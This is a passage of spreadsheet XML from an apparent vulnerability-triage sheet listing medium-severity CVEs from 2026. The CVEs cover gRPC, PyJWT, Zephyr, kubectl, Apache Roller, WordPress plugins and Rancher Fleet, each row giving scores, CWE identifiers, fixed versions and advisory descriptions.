          <t>A security vulnerability has been detected in Trusted Domain Project OpenDMARC up to 1.4.2. This impacts an unknown function of the file libopendmarc/opendmarc_policy.c of the component DMARC Parser. The manipulation of the argument pct leads to integer overflow. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T85" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101279</t>
        </is>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B86" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C86" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101914</t>
        </is>
      </c>
      <c r="D86" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E86" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F86" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G86" s="5" t="inlineStr"/>
      <c r="H86" s="5" t="inlineStr"/>
      <c r="I86" s="5" t="inlineStr"/>
      <c r="J86" s="5" t="inlineStr">
        <is>
          <t>npm, grpc</t>
        </is>
      </c>
      <c r="K86" s="5" t="inlineStr"/>
      <c r="L86" s="5" t="inlineStr">
        <is>
          <t>npm:@grpc/grpc-js-xds</t>
        </is>
      </c>
      <c r="M86" s="5" t="inlineStr">
        <is>
          <t>1.13.1, 1.14.1</t>
        </is>
      </c>
      <c r="N86" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O86" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P86" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q86" s="5" t="inlineStr"/>
      <c r="R86" s="5" t="inlineStr">
        <is>
          <t>CWE-187, CWE-863</t>
        </is>
      </c>
      <c r="S86" s="5" t="inlineStr">
        <is>
          <t>@grpc/grpc-js implements the core functionality of gRPC purely in JavaScript, without a C++ addon. Prior to 1.13.1 and 1.14.1, the exact path (method name) matcher used by RBAC performs a prefix comparison instead of an equality comparison when case-insensitive matching is enabled. If one service method name prefixes another and the methods have different access rules, a request for the longer method can match the shorter method's rule and cause incorrect authorization. This issue is fixed in versions 1.13.1 and 1.14.1.</t>
        </is>
      </c>
      <c r="T86" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101914</t>
        </is>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B87" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C87" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102275</t>
        </is>
      </c>
      <c r="D87" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E87" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F87" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G87" s="5" t="inlineStr"/>
      <c r="H87" s="5" t="inlineStr"/>
      <c r="I87" s="5" t="inlineStr"/>
      <c r="J87" s="5" t="inlineStr">
        <is>
          <t>python, go</t>
        </is>
      </c>
      <c r="K87" s="5" t="inlineStr"/>
      <c r="L87" s="5" t="inlineStr"/>
      <c r="M87" s="5" t="inlineStr"/>
      <c r="N87" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O87" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P87" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q87" s="5" t="inlineStr"/>
      <c r="R87" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-348</t>
        </is>
      </c>
      <c r="S87" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. From 2.1.0 until 2.15.0, PyJWT OKPAlgorithm.from_jwk in  jwt/algorithms.py is affected because private-JWK import path does not compare the public key derived from d with x. This occurs when an OKP private JWK supplies non-corresponding x and d components. As a result, identity derived from x can differ from operations performed with d. Consequently, if an integration also accepts private key parameters from a proof header without rejecting them, an attacker may use a stolen sender-constrained token without the legitimate private key. This issue is fixed in version 2.15.0.</t>
        </is>
      </c>
      <c r="T87" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102275</t>
        </is>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B88" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C88" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102373</t>
        </is>
      </c>
      <c r="D88" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E88" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F88" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G88" s="5" t="inlineStr"/>
      <c r="H88" s="5" t="inlineStr"/>
      <c r="I88" s="5" t="inlineStr"/>
      <c r="J88" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K88" s="5" t="inlineStr"/>
      <c r="L88" s="5" t="inlineStr"/>
      <c r="M88" s="5" t="inlineStr"/>
      <c r="N88" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O88" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P88" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q88" s="5" t="inlineStr"/>
      <c r="R88" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S88" s="5" t="inlineStr">
        <is>
          <t>GestSup versions before 3.2.62 fail to validate ticket ownership when loading comments via the threadedit parameter in thread.php. Authenticated attackers can enumerate sequential comment IDs to read private comments from other users' tickets without proper authorization checks.</t>
        </is>
      </c>
      <c r="T88" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102373</t>
        </is>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B89" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C89" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18417</t>
        </is>
      </c>
      <c r="D89" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E89" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F89" s="5" t="inlineStr">
        <is>
          <t>vulnerabilities@zephyrproject.org</t>
        </is>
      </c>
      <c r="G89" s="5" t="inlineStr"/>
      <c r="H89" s="5" t="inlineStr"/>
      <c r="I89" s="5" t="inlineStr"/>
      <c r="J89" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K89" s="5" t="inlineStr"/>
      <c r="L89" s="5" t="inlineStr"/>
      <c r="M89" s="5" t="inlineStr"/>
      <c r="N89" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O89" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P89" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q89" s="5" t="inlineStr"/>
      <c r="R89" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S89" s="5" t="inlineStr">
        <is>
          <t>The native BSD-socket layer recorded a pending asynchronous socket error by type-punning it into struct net_context's void user_data field (ctx-&gt;user_data = INT_TO_POINTER(-status) in zsock_accepted_cb(), zsock_received_cb(), zsock_connected_cb() and zsock_close_ctx() in subsys/net/lib/sockets/sockets_inet.c), reading it back with POINTER_TO_INT(). That same field is owned by the network stack for listening TCP contexts: net_tcp_accept() stores the parent context pointer there and the TCP core passes it back to the registered accept callback. A failed accept therefore left a small integer (an errno value) where the stack expected a struct net_context .
When the network interface carrying a listening TCP socket goes down, close_tcp_conn() in subsys/net/ip/tcp.c invokes the accept callback with -ENETDOWN and the context's user_data. In v4.3.0 the callback was not disarmed afterwards, so a second interface-down event forwarded the previously stored errno to zsock_accepted_cb(), which dereferenced it as the parent context and performed several stores through it (sock_set_error()'s read-modify-write of socket_data, k_fifo_cancel_wait(&amp;parent-&gt;recv_q)) — the crash described in the fix's commit message. v4.3.1 and v4.4.x carry a later change clearing conn-&gt;accept_cb after the error callback (269cb8823d3 on the v4.3 branch, 913fae5169425550f2364655298fceb79b320066 on main), which closes that repeat path; on those releases the poisoned cookie remains reachable only by a narrower race, a handshake completing alongside the interface-down still passing the stale cookie to k_fifo_put(&amp;parent-&gt;accept_q, ...), and by getsockopt(SO_ERROR), which reads the field back unconditionally.
On v4.3.0 an application that keeps a listening TCP socket open across repeated link-down events is sufficient to reach the defect; the triggering condition is a network-interface state change, not attacker-supplied packet data, so the practical attacker is one able to force the link down repeatedly (for example an adjacent attacker disrupting a wireless link) or one with local/physical access. Because both the faulting address and the stored data are fixed small constants derived from the errno value, the outcome is a wild-pointer access leading to a kernel fatal error — a denial of service (device crash or reset) rather than an attacker-directed memory corruption.
The fix stores the pending error in a dedicated net_context.sock_error field and converts every producer and consumer to sock_set_error()/sock_get_error(), leaving user_data untouched. As a side effect it also stops getsockopt(SO_ERROR) — which is evaluated unconditionally — from returning the kernel address held in user_data to a userspace application.</t>
        </is>
      </c>
      <c r="T89" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18417</t>
        </is>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B90" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C90" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19444</t>
        </is>
      </c>
      <c r="D90" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E90" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F90" s="5" t="inlineStr">
        <is>
          <t>jordan@liggitt.net</t>
        </is>
      </c>
      <c r="G90" s="5" t="inlineStr"/>
      <c r="H90" s="5" t="inlineStr"/>
      <c r="I90" s="5" t="inlineStr"/>
      <c r="J90" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K90" s="5" t="inlineStr"/>
      <c r="L90" s="5" t="inlineStr"/>
      <c r="M90" s="5" t="inlineStr"/>
      <c r="N90" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O90" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P90" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q90" s="5" t="inlineStr"/>
      <c r="R90" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S90" s="5" t="inlineStr">
        <is>
          <t>A path traversal vulnerability was discovered in the Kubernetes kubectl client's kubectl cp command on Windows. When copying files from a container, kubectl runs tar inside the container to build a tar archive, transfers it over the network, and unpacks it on the local machine. If the tar binary in the container is malicious, it can execute arbitrary code and emit unexpected output, allowing an attacker who controls container contents to write files to arbitrary paths on the user's local machine when kubectl cp is invoked, limited only by the system permissions of the local user. This issue only affects kubectl clients running on Windows.</t>
        </is>
      </c>
      <c r="T90" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19444</t>
        </is>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B91" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C91" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82385</t>
        </is>
      </c>
      <c r="D91" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E91" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F91" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G91" s="5" t="inlineStr"/>
      <c r="H91" s="5" t="inlineStr"/>
      <c r="I91" s="5" t="inlineStr"/>
      <c r="J91" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K91" s="5" t="inlineStr"/>
      <c r="L91" s="5" t="inlineStr"/>
      <c r="M91" s="5" t="inlineStr"/>
      <c r="N91" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O91" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P91" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q91" s="5" t="inlineStr"/>
      <c r="R91" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S91" s="5" t="inlineStr">
        <is>
          <t>Exposure of Sensitive Information to an Unauthorized Actor in Apache Roller 6.1.5 allows a weblog administrator to read files on the application classpath, including Roller configuration files containing secrets, by authoring a Velocity template that uses an include directive to load a classpath resource outside the theme namespace. Roller treats weblog administrators as untrusted and enables a Velocity sandbox, but the include and parse directives are not confined by it. No non-default configuration is required; this affects any weblog whose administrator can author templates. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which confines includes to the active theme and removes classpath resource loading from weblog rendering.</t>
        </is>
      </c>
      <c r="T91" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82385</t>
        </is>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B92" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C92" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84744</t>
        </is>
      </c>
      <c r="D92" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E92" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F92" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G92" s="5" t="inlineStr"/>
      <c r="H92" s="5" t="inlineStr"/>
      <c r="I92" s="5" t="inlineStr"/>
      <c r="J92" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K92" s="5" t="inlineStr"/>
      <c r="L92" s="5" t="inlineStr"/>
      <c r="M92" s="5" t="inlineStr"/>
      <c r="N92" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O92" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P92" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q92" s="5" t="inlineStr"/>
      <c r="R92" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S92" s="5" t="inlineStr">
        <is>
          <t>The WPForms Lite WordPress plugin from 1.5.0.1 to 2.0.2 does not remove shortcode delimiters from submitted field values before writing them back into the rendered form, allowing unauthenticated users to execute arbitrary shortcodes registered on the site and read the details of attachments belonging to non-public posts.</t>
        </is>
      </c>
      <c r="T92" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84744</t>
        </is>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B93" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C93" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93537</t>
        </is>
      </c>
      <c r="D93" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E93" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F93" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G93" s="5" t="inlineStr"/>
      <c r="H93" s="5" t="inlineStr"/>
      <c r="I93" s="5" t="inlineStr"/>
      <c r="J93" s="5" t="inlineStr">
        <is>
          <t>kubernetes, suse</t>
        </is>
      </c>
      <c r="K93" s="5" t="inlineStr"/>
      <c r="L93" s="5" t="inlineStr"/>
      <c r="M93" s="5" t="inlineStr"/>
      <c r="N93" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O93" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P93" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q93" s="5" t="inlineStr"/>
      <c r="R93" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="S93" s="5" t="inlineStr">
        <is>
          <t>A user who can supply bundle content to a repository referenced by a GitRepo resource, for example through Git push access, or through permission to create or modify a GitRepo, can cause SUSE Rancher Fleet to read files from the filesystem of the environment that processes the bundle and include their contents in the generated Bundle resource. This can expose configuration or credential material that the user has no Kubernetes RBAC permission to read, including Helm registry credentials made available to the bundle-processing job when per-path Helm credentials are configured.
This affects Fleet 0.16 before 0.16.2, 0.15 before 0.15.7, 0.14 before 0.14.11, 0.13 before 0.13.16, 0.12 before 0.12.20 and potentially older unsupported versions.</t>
        </is>
      </c>
      <c r="T93" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93537</t>
        </is>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B94" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C94" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93540</t>
        </is>
      </c>
      <c r="D94" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E94" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F94" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G94" s="5" t="inlineStr"/>
      <c r="H94" s="5" t="inlineStr"/>
      <c r="I94" s="5" t="inlineStr"/>
      <c r="J94" s="5" t="inlineStr">
        <is>
          <t>suse</t>
        </is>
      </c>
      <c r="K94" s="5" t="inlineStr"/>
      <c r="L94" s="5" t="inlineStr"/>
      <c r="M94" s="5" t="inlineStr"/>
      <c r="N94" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O94" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P94" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q94" s="5" t="inlineStr"/>
      <c r="R94" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="S94" s="5" t="inlineStr">
        <is>
          <t>A privilege mismatch was found in Fleet. When a bundle requested namespace labels or annotations through the namespaceLabels and namespaceAnnotations options, the resulting namespace metadata update was not subject to the same authorization as the rest of the bundle's deployment. As a result, a bundle could change labels and annotations on a target namespace even when the identity it was pinned to was not authorized to modify that namespace.
This affected SUSE Rancher Fleet 0.16 before 0.16.2, 0.15 before 0.15.7, 0.14 before 0.14.11, 0.13 before 0.13.16 and potentially older versions.</t>
        </is>
      </c>
      <c r="T94" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93540</t>
        </is>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B95" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C95" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89303</t>
        </is>
      </c>
      <c r="D95" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E95" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F95" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G95" s="5" t="inlineStr"/>
      <c r="H95" s="5" t="inlineStr"/>
      <c r="I95" s="5" t="inlineStr"/>
      <c r="J95" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K95" s="5" t="inlineStr"/>
      <c r="L95" s="5" t="inlineStr"/>
      <c r="M95" s="5" t="inlineStr"/>
      <c r="N95" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O95" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P95" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q95" s="5" t="inlineStr"/>
      <c r="R95" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S95" s="5" t="inlineStr">
        <is>
          <t>The Post Voting System WordPress plugin through 1.0 does not properly sanitize and escape a parameter before using it in a SQL query, allowing any authenticated user to perform SQL injection attacks.</t>
        </is>
      </c>
      <c r="T95" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89303</t>
        </is>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B96" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C96" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101913</t>
        </is>
      </c>
      <c r="D96" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E96" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F96" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G96" s="5" t="inlineStr"/>
      <c r="H96" s="5" t="inlineStr"/>
      <c r="I96" s="5" t="inlineStr"/>
      <c r="J96" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K96" s="5" t="inlineStr"/>
      <c r="L96" s="5" t="inlineStr">
        <is>
          <t>npm:ip-address</t>
        </is>
      </c>
      <c r="M96" s="5" t="inlineStr">
        <is>
          <t>10.5.1</t>
        </is>
      </c>
      <c r="N96" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O96" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P96" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q96" s="5" t="inlineStr"/>
      <c r="R96" s="5" t="inlineStr">
        <is>
          <t>CWE-697, CWE-918</t>
        </is>
      </c>
      <c r="S96" s="5" t="inlineStr">
        <is>
          <t>ip-address is a library for parsing and manipulating IPv4 and IPv6 addresses in JavaScript. Prior to 10.5.1, the Address6 isLinkLocal method in src/ipv6.ts recognizes only fe80::/64 instead of the complete fe80::/10 IPv6 link-local range. An attacker-controlled address elsewhere in fe80::/10 can therefore pass a trust-boundary check that relies on isLinkLocal. The same address is identified as link-local by getType and getScope, exposing the inconsistent classification. A successful bypass can reach an on-link host outside the intended trust boundary. This issue is fixed in version 10.5.1.</t>
        </is>
      </c>
      <c r="T96" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101913</t>
        </is>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B97" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C97" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102414</t>
        </is>
      </c>
      <c r="D97" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E97" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F97" s="5" t="inlineStr">
        <is>
          <t>7ffcee3d-2c14-4c3e-b844-86c6a321a158</t>
        </is>
      </c>
      <c r="G97" s="5" t="inlineStr"/>
      <c r="H97" s="5" t="inlineStr"/>
      <c r="I97" s="5" t="inlineStr"/>
      <c r="J97" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K97" s="5" t="inlineStr"/>
      <c r="L97" s="5" t="inlineStr"/>
      <c r="M97" s="5" t="inlineStr"/>
      <c r="N97" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O97" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P97" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q97" s="5" t="inlineStr"/>
      <c r="R97" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S97" s="5" t="inlineStr">
        <is>
          <t>pbkdf2 through 3.1.6 re-hashes passwords longer than the digest's block size on every iteration in its JavaScript fallback (lib/sync.js). A password longer than the block size (64 bytes, or 128 bytes for sha384 and sha512) is passed to HMAC as the key on every iteration, and HMAC hashes such keys in full each time. Cost is therefore O(iterations × password length), and a long password can block the event loop. The fallback is used by pbkdf2Sync and pbkdf2 on Node.js before 0.12, on Bun (1.0.0 through 1.1.34, and 1.2.6 and later), and on Deno 2.9.0 and later, because their native pbkdf2Sync fails the library's feature check. It is also used when lib/sync.js is imported directly. Node.js 0.12 and later, and browser builds (which use lib/sync-browser.js), are not affected. Applications that enforce a reasonable maximum password length are not meaningfully affected.</t>
        </is>
      </c>
      <c r="T97" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102414</t>
        </is>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B98" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C98" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18415</t>
        </is>
      </c>
      <c r="D98" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E98" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F98" s="5" t="inlineStr">
        <is>
          <t>vulnerabilities@zephyrproject.org</t>
        </is>
      </c>
      <c r="G98" s="5" t="inlineStr"/>
      <c r="H98" s="5" t="inlineStr"/>
      <c r="I98" s="5" t="inlineStr"/>
      <c r="J98" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K98" s="5" t="inlineStr"/>
      <c r="L98" s="5" t="inlineStr"/>
      <c r="M98" s="5" t="inlineStr"/>
      <c r="N98" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O98" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P98" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q98" s="5" t="inlineStr"/>
      <c r="R98" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S98" s="5" t="inlineStr">
        <is>
          <t>ieee802154_send() in subsys/net/l2/ieee802154/ieee802154.c copies the outgoing packet into a single fixed 125-byte transmit buffer (tx_frame_buf_pool, sized IEEE802154_MTU). In builds with CONFIG_NET_L2_IEEE802154_FRAGMENT enabled (the default whenever CONFIG_NET_6LO is set), the branch taken when 6LoWPAN fragmentation is not required performed an unchecked net_buf_add_mem(frame_buf, pkt_buf-&gt;data, pkt_buf-&gt;len). The only guard was __ASSERT_NO_MSG() inside net_buf_simple_add(), which is compiled out without CONFIG_ASSERT, so an oversized packet silently overran the frame buffer.
The defect is not reachable from the radio: for NET_AF_INET6 packets ieee802154_6lo_encode_pkt() compares the whole packet length against IEEE802154_MTU and takes the fragmentation path when it does not fit, so every buffer copied on the unfragmented branch is within bounds. It is reachable through NET_AF_PACKET sockets bound to an 802.15.4 interface: for NET_SOCK_RAW the 6LoWPAN block is skipped entirely and for NET_SOCK_DGRAM it returns early on the address-family test, leaving no length validation anywhere on the transmit path (net_context_sendto() and net_if_tx() apply none, and pkt_buffer_length() does not clamp the allocation for this L2).
An application — or, in a CONFIG_USERSPACE build, an unprivileged application thread using the zsock_socket()/zsock_sendto() syscalls — can therefore drive a supervisor-mode out-of-bounds write of chosen bytes past the 125-byte pool buffer. With the default CONFIG_NET_BUF_FIXED_DATA_SIZE of 128 bytes the overrun is bounded to roughly ll_hdr_len + 3 bytes; with CONFIG_NET_BUF_VARIABLE_DATA_SIZE a single storage buffer can be as large as CONFIG_NET_PKT_BUF_TX_DATA_POOL_SIZE, making the overrun far larger. The consequence is corruption of memory adjacent to the pool, with a crash or further compromise of kernel state as the practical impact.
